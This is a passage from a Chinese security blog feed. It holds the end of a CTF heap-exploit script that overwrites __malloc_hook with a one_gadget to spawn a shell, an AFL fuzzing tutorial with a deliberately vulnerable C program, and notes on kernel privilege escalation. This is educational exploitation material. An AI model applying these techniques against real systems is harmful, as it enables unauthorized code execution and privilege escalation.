class="number">0x21</span>)</span><br><span class="line">payload += p64(<span class="number">2</span>) + p64(target_addr)</span><br><span class="line">payload += p64(<span class="number">0x100</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;\xff&#x27;</span>*<span class="number">0x20</span></span><br><span class="line">write_a_review(<span class="number">1</span>,payload)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x31</span>)</span><br><span class="line">payload += p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span> + p64(<span class="number">0x21</span>)</span><br><span class="line">payload += p64(<span class="number">2</span>) + p64(heap_base+<span class="number">0x360</span>)</span><br><span class="line">payload += p64(<span class="number">0x100</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">add(<span class="number">3</span>)</span><br><span class="line">parent(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;b&#x27;</span>*<span class="number">0x18</span> + p64(<span class="number">0x31</span>) + p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span></span><br><span class="line">payload += p64(<span class="number">0x21</span>) + p64(<span class="number">2</span>) + p64(heap_base+<span class="number">0x2b8</span>) + p64(<span class="number">0x110</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">write_a_review(<span class="number">2</span>,p64(<span class="number">0</span>))</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_changeid(<span class="number">2</span>)</span><br><span class="line">student_check()</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) + <span class="number">0x66</span></span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">one = libc_base + <span class="number">0xe3b31</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0xe3b2e execve(&quot;/bin/sh&quot;, r15, r12)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string">  [r12] == NULL || r12 == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe3b31 execve(&quot;/bin/sh&quot;, r15, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string">  [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe3b34 execve(&quot;/bin/sh&quot;, rsi, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsi] == NULL || rsi == NULL</span></span><br><span class="line"><span class="string">  [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(malloc_hook))</span><br><span class="line"></span><br><span class="line">studenttoTeacher()</span><br><span class="line">payload = <span class="string">&#x27;b&#x27;</span>*<span class="number">0x18</span> + p64(<span class="number">0x31</span>) + p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span></span><br><span class="line">payload += p64(<span class="number">0x21</span>) + p64(<span class="number">2</span>) + p64(malloc_hook) + p64(<span class="number">0x110</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">write_a_review(<span class="number">2</span>,p64(one))</span><br><span class="line">cmd(<span class="number">6</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h1 id="babynote"><a href="#babynote" class="headerlink" title="babynote"></a>babynote</h1><blockquote><p>It’s just a traditional challenge<br>nc 123.60.76.240 60001</p></blockquote><p>一个musl的题目</p><h2 id="libc-so"><a href="#libc-so" class="headerlink" title="libc.so"></a>libc.so</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">musl libc (x86_64)</span><br><span class="line">Version 1.2.2</span><br><span class="line">Dynamic Program Loader</span><br><span class="line">Usage: ./libc.so [options] [--] pathname [args]</span><br></pre></td></tr></table></figure><h2 id="musl启动方法"><a href="#musl启动方法" class="headerlink" title="musl启动方法"></a>musl启动方法</h2><p>直接利用题目给的libc文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./libc.so ./babynote</span><br></pre></td></tr></table></figure><p>exp中：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p = process([<span class="string">&quot;./libc.so&quot;</span>,<span class="string">&#x27;./babynote&#x27;</span>])</span><br></pre></td></tr></table></figure><h2 id="musl-pwn基础"><a href="#musl-pwn基础" class="headerlink" title="musl pwn基础"></a>musl pwn基础</h2><p>咕咕咕…</p><h1 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h1><blockquote><p>$ ping 123.60.8.251<br>PING 123.60.8.251 (123.60.8.251): 56 data bytes<br>64 bytes from 123.60.8.251: icmp_seq=0 ttl=39 time=20.397 ms<br>64 bytes from 123.60.8.251: icmp_seq=1 ttl=39 time=18.976 ms<br>64 bytes from 123.60.8.251: icmp_seq=2 ttl=39 time=20.381 ms<br>64 bytes from 123.60.8.251: icmp_seq=3 ttl=39 time=18.297 ms<br>64 bytes from 123.60.8.251: icmp_seq=4 ttl=39 time=20.751 ms</p><p>mirror server: 20.239.70.121</p></blockquote><h1 id="babyarm"><a href="#babyarm" class="headerlink" title="babyarm"></a>babyarm</h1><blockquote><p>It is so simple, simplest, cannot be simpler…</p><p><a href="https://drive.google.com/file/d/1urPkXtXQvgbuoiC12wlJ9Kp6U1B8frTu/view?usp=sharing">Download Link</a></p><p>nc 124.70.158.154 60001</p></blockquote>]]></content>
    
    
    <summary type="html">XCTF-StartCTF</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
  </entry>
  
  <entry>
    <title>FUZZ-AFL</title>
    <link href="https://trick.ink/article/FUZZ-AFL/"/>
    <id>https://trick.ink/article/FUZZ-AFL/</id>
    <published>2022-04-12T06:18:55.000Z</published>
    <updated>2023-02-09T18:00:12.424Z</updated>
    
    <content type="html"><![CDATA[<h1 id="FUZZ-AFL"><a href="#FUZZ-AFL" class="headerlink" title="FUZZ-AFL"></a>FUZZ-AFL</h1><!-- 文章页 配置 --><h1 id="浅试FUZZ-AFL安装与使用"><a href="#浅试FUZZ-AFL安装与使用" class="headerlink" title="浅试FUZZ-AFL安装与使用"></a>浅试FUZZ-AFL安装与使用</h1><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>官网下载：<a href="https://lcamtuf.coredump.cx/afl/">https://lcamtuf.coredump.cx/afl/</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">make</span><br><span class="line">sudo make install</span><br></pre></td></tr></table></figure><p>验证成功</p><p><img src="/article/FUZZ-AFL/image-20220424191446449.png" alt="image-20220424191446449"></p><h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h2><p>创建两个文件夹</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mkdir fuzz_in</span><br><span class="line">mkdir fuzz_out</span><br></pre></td></tr></table></figure><p>简单的测试用例</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;signal.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">fun</span><span class="params">(<span class="keyword">char</span> *buf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(buf[<span class="number">0</span>]=<span class="string">&#x27;a&#x27;</span>&amp;&amp;<span class="built_in">strlen</span>(buf)==<span class="number">5</span>)</span><br><span class="line">        raise(SIGSEGV);<span class="comment">//如果输入的字符串开头是a，且长度为5，则异常退出</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="keyword">char</span> buf[<span class="number">100</span>]=&#123;<span class="number">0</span>&#125;;</span><br><span class="line">        gets(buf); <span class="comment">//栈溢出漏洞</span></span><br><span class="line">        <span class="built_in">printf</span>(buf); <span class="comment">//格式化字符串漏洞</span></span><br><span class="line">        fun(buf);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="编译"><a href="#编译" class="headerlink" title="编译"></a>编译</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">afl-gcc -g -o <span class="built_in">test</span> test.c</span><br></pre></td></tr></table></figure><h3 id="创建数据"><a href="#创建数据" class="headerlink" title="创建数据"></a>创建数据</h3><p>在fuzz_in文件夹中创建文件test，并随便输入一些数据</p><h3 id="开始FUZZ"><a href="#开始FUZZ" class="headerlink" title="开始FUZZ"></a>开始FUZZ</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">afl-fuzz -i fuzz_in -o fuzz_out ./<span class="built_in">test</span></span><br></pre></td></tr></table></figure><p><img src="/article/FUZZ-AFL/image-20220424192447765.png" alt="image-20220424192447765"></p><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>在fuzz_out的crashes文件中找到需要分析的crash</p><p><img src="/article/FUZZ-AFL/image-20220424193216200.png" alt="image-20220424193216200"></p><ol><li></li></ol><h1 id="FUZZ之源码阅读"><a href="#FUZZ之源码阅读" class="headerlink" title="FUZZ之源码阅读"></a>FUZZ之源码阅读</h1><p>读源码真的会谢</p><h2 id="获取命令行参数"><a href="#获取命令行参数" class="headerlink" title="获取命令行参数"></a>获取命令行参数</h2><p>通过<code>getopt</code>扫描我们的 argv 里面的参数。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">while</span> ((opt = getopt(argc, argv, <span class="string">&quot;+i:o:f:m:t:T:dnCB:S:M:x:Q&quot;</span>)) &gt; <span class="number">0</span>)</span><br></pre></td></tr></table></figure><ul><li><p>-i：设置输入文件。</p><ul><li>如果 in_dir = “-“，设置 in_place_resume = 1</li></ul></li><li><p>-o：设置输出文件。</p></li><li><p>-M：主同步ID（sync_id），用于并行fuzz。</p><ul><li><code>force_deterministic = 1</code>，</li></ul></li><li><p>-S：从同步ID（sync_id），用于并行fuzz。</p></li><li><p>-f：模糊程序读取case的位置。</p><ul><li><code>out_file</code>变量被赋值。</li></ul></li><li><p>-x：设置自定义token（一些容易触发漏洞的输入，比如边界值、很大的数…）。用于后面变异过程中的替换和插入。</p><ul><li><code>extras_dir</code>变量被赋值。</li></ul></li><li><p>-t：设置被测试程序的运行时间限制。</p><ul><li><code>exec_tmout</code>变量被赋值（%u）。</li><li>如果后缀为”+”，则 timeout_given = 2；否则 timeout_given = 1，表示设置了运行时间限制。</li></ul></li><li><p>-m：设置被测程序的内存空间大小。</p><ul><li><code>mem_limit_given = 1</code>，表示设置了内存空间。</li><li><code>mem_limit</code>变量被赋值为内存大小，默认单位是M，可以设置K、G、T。</li></ul></li><li><p>-d：跳过变异时的确定性变异阶段。</p><ul><li><code>skip_deterministic = 1</code></li><li><code>use_splicing = 1</code>，（重新组合输入文件）</li></ul></li><li><p>-B：读取位图？（基本用不到）</p><ul><li>大概意思是：在测试的过程中如果发现了有趣的测试用例，在没有发现新的测试用例的情况下对其进行变异。</li><li><code>in_bitmap</code>变量被赋值。</li></ul></li><li><p>-C：将一个测试用例crash作为afl-fuzz的输入。（crash mode）</p><ul><li>可以快速地产生很多和输入crash相关，但稍微不同的crashes。</li><li><code>crash_mode</code>变量被赋值。</li></ul></li><li><p>-n：非插桩模式。（dumb mode）</p><ul><li>如果环境变量中有”AFL_DUMB_FORKSRV”，<code>dumb_mode = 2</code>，否则为1。</li></ul></li><li><p>-T：修改横幅名称</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">afl-fuzz -i fuzz_in -o fuzz_out -T aTestOpt-T ./<span class="built_in">test</span></span><br></pre></td></tr></table></figure><p>在fuzz时横幅会变成：american fuzzy lop 2.52b (aTestOpt-T)</p><p>如果没有-T，默认是程序名称，也就是test</p></li><li><p>-Q：QEMU模式。</p><ul><li><code>qemu_mode = 1</code></li><li>如果没有设置运行内存限制（-m），即（!mem_limit_given），则<code>mem_limit = MEM_LIMIT_QEMU</code>。</li></ul></li><li><p>default：<code>usage(argv[0])</code></p><p>打印使用提示。</p></li></ul><h2 id="setup-signal-handlers"><a href="#setup-signal-handlers" class="headerlink" title="setup_signal_handlers"></a>setup_signal_handlers</h2><p>注册必要的信号处理函数</p><ul><li><p>停止的各种方式</p><ul><li>如果进程接收到这些信号中的一个，而事先又没有安排捕获它，进程就会终止。</li><li>SIGHUP（hangup）：连接挂断</li><li>SIGINT（interrupt）：终端中断</li><li>SIGTERM（software termination signal from kill）：终止</li><li>handle_stop_sig<ul><li>设置stop_soon为1</li><li>如果child_pid存在，向其发送SIGKILL终止信号，从而被系统杀死</li><li>如果forksrv_pid存在，向其发送SIGKILL终止信号</li></ul></li></ul></li><li><p>处理超时的情况</p><ul><li>SIGALRM（alarm clock）</li><li>handle_timeout<ul><li>如果child_pid&gt;0，则设置child_timed_out为1，并kill掉child_pid</li><li>如果child_pid==-1，且forksrv_pid&gt;0，则设置child_timed_out为1，并kill掉forksrv_pid</li></ul></li></ul></li><li><p>处理窗口大小变化的信号</p><ul><li>SIGWINCH（Window resize）</li><li>handle_resize<ul><li>设置clear_screen=1</li></ul></li></ul></li><li><p>用户自定义信号</p><ul><li>SIGUSR1（user defined signal 1）</li><li>handle_skipreq<ul><li>设置skip_requested=1</li></ul></li></ul></li><li><p>不关心的信号</p><ul><li>SIGTSTP（stop signal from tty）</li><li>SIGPIPE（write on a pipe with no one to read it）</li><li>设置为SIG_IGN（忽略信号）</li></ul></li></ul><h2 id="check-asan-opts"><a href="#check-asan-opts" class="headerlink" title="check_asan_opts"></a>check_asan_opts</h2><p>读取环境变量<code>ASAN_OPTIONS</code>和<code>MSAN_OPTIONS</code>，做一些必要性检查</p><p>ASAN是一个快速的内存错误检测工具</p><h2 id="fix-up-sync"><a href="#fix-up-sync" class="headerlink" title="fix_up_sync"></a>fix_up_sync</h2><p>检查环境变量中的一些冲突参数。</p><ul><li><p>如果环境变量参数中用了-M或者-S，则改变了sync_id的值，会进入到该函数中</p><ul><li><code>sync_dir = out_dir</code></li><li><code>out_dir  = out_dir/sync_id</code></li></ul></li><li><p>如果参数中没有-M</p><ul><li>等同于输入了参数-d</li><li><code>skip_deterministic = 1</code>。跳过确定性阶段</li><li><code>use_splicing = 1</code>。重新组合输入文件</li></ul></li></ul><h2 id="save-cmdline"><a href="#save-cmdline" class="headerlink" title="save_cmdline"></a>save_cmdline</h2><p>将命令行参数保存到全局变量<code>orig_cmdline</code>中</p><h2 id="fix-up-banner"><a href="#fix-up-banner" class="headerlink" title="fix_up_banner"></a>fix_up_banner</h2><p>修剪并且创建一个运行横幅。与参数-T相关</p><h2 id="check-if-tty"><a href="#check-if-tty" class="headerlink" title="check_if_tty"></a>check_if_tty</h2><p>检查是否在tty终端上运行</p><ul><li>读取环境变量是否存在AFL_NO_UI，存在则<code>not_on_tty = 1</code></li><li>通过函数<code>ioctl(1, TIOCGWINSZ, &amp;ws)</code>读取window size，如果报错为ENOTTY，则代表当前不在一个tty终端运行，<code>not_on_tty = 1</code></li></ul><h2 id="get-core-count"><a href="#get-core-count" class="headerlink" title="get_core_count"></a>get_core_count</h2><p>获取cpu核心数量。保存在全局变量<code>cpu_core_count</code>中</p><h2 id="bind-to-free-cpu"><a href="#bind-to-free-cpu" class="headerlink" title="bind_to_free_cpu"></a>bind_to_free_cpu</h2><p>构建绑定到特定核心的进程列表</p><h2 id="check-crash-handling"><a href="#check-crash-handling" class="headerlink" title="check_crash_handling"></a>check_crash_handling</h2><p>如果系统配置为将核心转储文件（core）通知发送到外部程序，会导致将崩溃信息发送到Fuzzer之间的延迟增大，进而可能将崩溃被误报为超时，所以我们得临时修改core_pattern文件</p><p>就是第一次运行时报错让你去执行的那句话（echo core &gt; /proc/sys/kernel/core_pattern）就是因为这个函数</p><h2 id="check-cpu-governor"><a href="#check-cpu-governor" class="headerlink" title="check_cpu_governor"></a>check_cpu_governor</h2><p>检查CPU管理者</p><h2 id="setup-post"><a href="#setup-post" class="headerlink" title="setup_post"></a>setup_post</h2><p>加载后置处理器</p><h2 id="setup-shm"><a href="#setup-shm" class="headerlink" title="setup_shm"></a>setup_shm</h2><p>设置 <code>trace_bits</code> 和 <code>virgin_bits</code></p><ul><li><p>如果<code>in_bitmap = 0</code>，则通过<code>memset(virgin_bits, 255, MAP_SIZE)</code>初始化数组为255（0xff）。<code>in_bitmap</code>与参数-B有关</p></li><li><p>继续使用<code>memset</code>初始化：<code>memset(virgin_tmout, 255, MAP_SIZE); memset(virgin_crash, 255, MAP_SIZE);</code></p></li><li><p><code>shm_id = shmget(IPC_PRIVATE, MAP_SIZE, IPC_CREAT | IPC_EXCL | 0600);</code></p><ul><li>函数原型：<code>int shmget(key_t key, size_t size, int shmflg);</code>，用来创建共享内存<ul><li>第一个参数：程序需要提供一个参数key（非0整数），它有效地为共享内存段命名，shmget()函数成功时返回一个与key相关的共享内存标识符（非负整数），用于后续的共享内存函数。调用失败返回-1<ul><li>这里shm_id取值是IPC_PRIVATE，所以函数shmget()将创建一块新的共享内存</li></ul></li><li>第二个参数：size以字节为单位指定需要共享的内存容量</li><li>第三个参数：权限标志<ul><li>IPC_CREAT：如果共享内存不存在，则创建一个共享内存，否则打开操作</li><li>IPC_EXCL：只有在共享内存不存在的时候，新的共享内存才建立，否则就产生错误</li><li>0600：每一位表示一种类型的权限，比如，第一位是表示八进制,第二位表示拥有者的权限为读写，第三位表示同组无权限，第四位表示他人无权限</li></ul></li></ul></li></ul></li><li><p><code>atexit(remove_shm)</code>，注册终止函数</p><ul><li><p>注册为函数<code>remove_shm</code></p></li><li><p>```c<br>static void remove_shm(void) {<br>  shmctl(shm_id, IPC_RMID, NULL);<br>}</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">    * 函数原型：&#96;int shmctl(int shm_id, int command, struct shmid_ds *buf);&#96;</span><br><span class="line">    </span><br><span class="line">      * 第一个参数：shm_id是shmget()函数返回的共享内存标识符。</span><br><span class="line">      * 第二个参数：command是要采取的操作，它可以取三个值</span><br><span class="line">        * IPC_STAT：把shmid_ds结构中的数据设置为共享内存的当前关联值，即用共享内存的当前关联值覆盖shmid_ds的值。</span><br><span class="line">        * IPC_SET：如果进程有足够的权限，就把共享内存的当前关联值设置为shmid_ds结构中给出的值</span><br><span class="line">        * IPC_RMID：删除共享内存段</span><br><span class="line">    </span><br><span class="line">      * 第三个参数：buf，一个结构指针</span><br><span class="line">  </span><br><span class="line">* 如果不是&#96;dump_mode&#96;，则设置环境变量&#96;SHM_ENV_VAR&#96;的值为&#96;shm_str&#96;。&#96;dump_mode&#96;与参数-n有关</span><br><span class="line"></span><br><span class="line">* &#96;trace_bits &#x3D; shmat(shm_id, NULL, 0);&#96;</span><br><span class="line"></span><br><span class="line">  * 第一次创建共享内存之后还不能被任何进程访问，所以需要通过shmat函数来启动对该共享内存的访问，并把共享内存连接到当前进程的地址空间</span><br><span class="line">  * 函数原型：&#96;void *shmat(int shm_id, const void *shm_addr, int shmflg)&#96;</span><br><span class="line">    * 第一个参数，shm_id是由shmget()函数返回的共享内存标识</span><br><span class="line">    * 第二个参数，shm_addr指定共享内存连接到当前进程中的地址位置，通常为空，表示让系统来选择共享内存的地址</span><br><span class="line">    * 第三个参数，shm_flg是一组标志位，通常为0</span><br><span class="line">    * 调用成功时返回一个指向共享内存第一个字节的指针，如果调用失败返回-1</span><br><span class="line"></span><br><span class="line">## init_count_class16</span><br><span class="line"></span><br><span class="line">路径命中次数规整。</span><br><span class="line">trace_bits是用一个字节来记录是否到达这个路径，和这个路径被命中了多少次的，即 &#96;count_class_lookup8[256]&#96;。</span><br><span class="line">在每次去计算是否发现了新路径之前，先把这个路径命中次数进行规整，比如把命中4~7次都统计为命中了8次。</span><br><span class="line"></span><br><span class="line">&#96;&#96;&#96;c</span><br><span class="line">static const u8 count_class_lookup8[256] &#x3D; &#123;</span><br><span class="line">  [0]           &#x3D; 0,</span><br><span class="line">  [1]           &#x3D; 1,</span><br><span class="line">  [2]           &#x3D; 2,</span><br><span class="line">  [3]           &#x3D; 4,</span><br><span class="line">  [4 ... 7]     &#x3D; 8,</span><br><span class="line">  [8 ... 15]    &#x3D; 16,</span><br><span class="line">  [16 ... 31]   &#x3D; 32,</span><br><span class="line">  [32 ... 127]  &#x3D; 64,</span><br><span class="line">  [128 ... 255] &#x3D; 128</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li></ul></li></ul><p>而在实际的规整过程中是一次规整两个字节，即<code>count_class_lookup8[65536]</code></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">EXP_ST <span class="keyword">void</span> <span class="title">init_count_class16</span><span class="params">(<span class="keyword">void</span>)</span> </span>&#123;</span><br><span class="line">  u32 b1, b2;</span><br><span class="line">  <span class="keyword">for</span> (b1 = <span class="number">0</span>; b1 &lt; <span class="number">256</span>; b1++) </span><br><span class="line">    <span class="keyword">for</span> (b2 = <span class="number">0</span>; b2 &lt; <span class="number">256</span>; b2++)</span><br><span class="line">      count_class_lookup16[(b1 &lt;&lt; <span class="number">8</span>) + b2] = </span><br><span class="line">        (count_class_lookup8[b1] &lt;&lt; <span class="number">8</span>) |</span><br><span class="line">        count_class_lookup8[b2];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="setup-dirs-fds"><a href="#setup-dirs-fds" class="headerlink" title="setup_dirs_fds"></a>setup_dirs_fds</h2><p>设置输出目录和文件描述符。</p><ul><li>如果sync_id存在<ul><li>创建sync_dir文件夹</li></ul></li><li>创建out_dir文件夹<ul><li>调用<code>maybe_delete_out_dir</code>，返回文件句柄out_dir_fd<ul><li><code>out_dir_fd = open(out_dir, O_RDONLY);</code><ul><li>以只读的模式打开</li></ul></li></ul></li></ul></li><li>创建queue文件夹<ul><li>创建<code>out_dir/queue</code></li><li>创建<code>out_dir/queue/.state/</code></li><li>创建<code>out_dir/queue/.state/deterministic_done</code></li><li>创建<code>out_dir/queue/.state/auto_extras</code></li><li>创建<code>out_dir/queue/.state/redundant_edges</code></li><li>创建<code>out_dir/queue/.state/variable_behavior</code></li></ul></li><li>如果sync_id存在<ul><li>创建<code>out_dir/.synced</code>文件夹</li></ul></li><li>创建<code>out_dir/crashes</code>文件夹</li><li>创建<code>out_dir/hangs</code>文件夹</li><li>创建<code>out_dir/hangs</code>文件夹</li><li>通常有用的文件描述符<ul><li><code>dev_null_fd = open(&quot;/dev/null&quot;, O_RDWR);</code>，读写模式</li><li><code>dev_urandom_fd = open(&quot;/dev/urandom&quot;, O_RDONLY);</code>，只读模式</li></ul></li><li>创建Gnuplot输出文件<ul><li>以只写模式打开<code>out_dir/plot_data</code>文件</li><li>写入<code>\# unix_time, cycles_done, cur_path, paths_total, pending_total, pending_favs, map_size, unique_crashes, unique_hangs, max_depth, execs_per_sec\n </code></li></ul></li></ul><h2 id="read-testcases"><a href="#read-testcases" class="headerlink" title="read_testcases"></a>read_testcases</h2><p>从输入文件中读取testcases，排成队列用于测试</p><ul><li>尝试访问<code>in_dir/queue</code>文件夹，如果存在，重新设置<code>in_dir = fn;</code></li><li></li></ul>]]></content>
    
    
    <summary type="html">FUZZ-AFL</summary>
    
    
    
    <category term="笔记" scheme="https://trick.ink/categories/%E7%AC%94%E8%AE%B0/"/>
    
    
    <category term="fuzz" scheme="https://trick.ink/tags/fuzz/"/>
    
  </entry>
  
  <entry>
    <title>Linux Kernel 0x1</title>
    <link href="https://trick.ink/article/Linux%20Kernel%200x1/"/>
    <id>https://trick.ink/article/Linux%20Kernel%200x1/</id>
    <published>2022-04-04T03:36:43.000Z</published>
    <updated>2023-02-09T17:56:34.594Z</updated>
    
    <content type="html"><![CDATA[<h1 id="Linux-Kernel-0x1"><a href="#Linux-Kernel-0x1" class="headerlink" title="Linux Kernel 0x1"></a>Linux Kernel 0x1</h1><!-- 文章页 配置 --><h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><h2 id="内核保护"><a href="#内核保护" class="headerlink" title="内核保护"></a>内核保护</h2><h3 id="SMAP-Supervisor-Mode-Access-Prevention"><a href="#SMAP-Supervisor-Mode-Access-Prevention" class="headerlink" title="SMAP(Supervisor Mode Access Prevention)"></a>SMAP(Supervisor Mode Access Prevention)</h3><p>管理模式访问保护。禁止内核访问用户空间的数据。</p><h3 id="SMEP-Supervisor-Mode-Execution-Prevention"><a href="#SMEP-Supervisor-Mode-Execution-Prevention" class="headerlink" title="SMEP(Supervisor Mode Execution Prevention)"></a>SMEP(Supervisor Mode Execution Prevention)</h3><p>管理模式执行保护。禁止执行用户空间的代码。类似于用户态的NX保护。</p><p>ps：在内核命令行中添加nosmap和nosmep禁用。</p><h3 id="Stack-protector"><a href="#Stack-protector" class="headerlink" title="Stack protector"></a>Stack protector</h3><p>类似于用户态的Canary。</p><h3 id="KASLR"><a href="#KASLR" class="headerlink" title="KASLR"></a>KASLR</h3><p>内核地址空间分布随机化。类似于用户态的ASLR。</p><h3 id="Kernel-Address-Display-Restriction"><a href="#Kernel-Address-Display-Restriction" class="headerlink" title="Kernel Address Display Restriction"></a>Kernel Address Display Restriction</h3><p>在linux内核漏洞利用中常常使用commit_creds和prepare_kernel_cred来完成提权，它们的地址可以从/proc/kallsyms中读取。从Ubuntu 11.04和RHEL 7开始，/proc/sys/kernel/kptr_restrict被默认设置为1以阻止通过这种方式泄露内核地址。（非root用户不可读取）</p><h2 id="内核提权"><a href="#内核提权" class="headerlink" title="内核提权"></a>内核提权</h2><h3 id="方式"><a href="#方式" class="headerlink" title="方式"></a>方式</h3><ol><li>修改cred结构体</li><li>调用<code>commit_creds(prepare_kernel_cred(0))</code>完成提权</li></ol><h3 id="cred结构体"><a href="#cred结构体" class="headerlink" title="cred结构体"></a>cred结构体</h3><p>每个进程中都有一个 cred 结构，这个结构保存了该进程的权限等信息（uid，gid 等），如果能修改某个进程的 cred，那么也就修改了这个进程的权限。</p><p>struct cred <a href="https://code.woboq.org/linux/linux/include/linux/cred.h.html#cred">源码</a> 如下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 